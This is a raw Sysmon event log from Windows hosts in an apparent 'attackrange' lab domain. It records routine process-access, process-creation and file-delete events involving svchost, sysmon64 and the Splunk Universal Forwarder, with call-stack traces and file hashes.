10341000x8000000000000000291239Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291238Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291237Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291236Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291235Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291234Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291233Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291232Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291231Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-01FF-6088-EF29-00000000BB01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291230Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-01FF-6088-EF29-00000000BB01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291229Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:23.331{BEA10069-01FF-6088-EF29-00000000BB01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000439933Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:23.092{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439932Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:23.092{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291273Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.919{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80FE293259442F190C2DB31744AF57D6,SHA256=CC25D0B17E9C973759336CC9BA88E3358B3B2086D9F275256A09D128CF7D5912,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439938Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:24.609{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCB835777372155DBF05AE77E81965D1,SHA256=0BB6D9A47915D1F97A88A73799E4502EEF297ECF0FF81DABBF00ED172CBBA94F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439937Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:24.093{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439936Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:24.093{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291272Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.803{BEA10069-0200-6088-F129-00000000BB01}55086896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291271Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-0200-6088-F129-00000000BB01}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291270Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291269Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291268Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291267Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291266Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291265Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291264Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291263Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291262Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9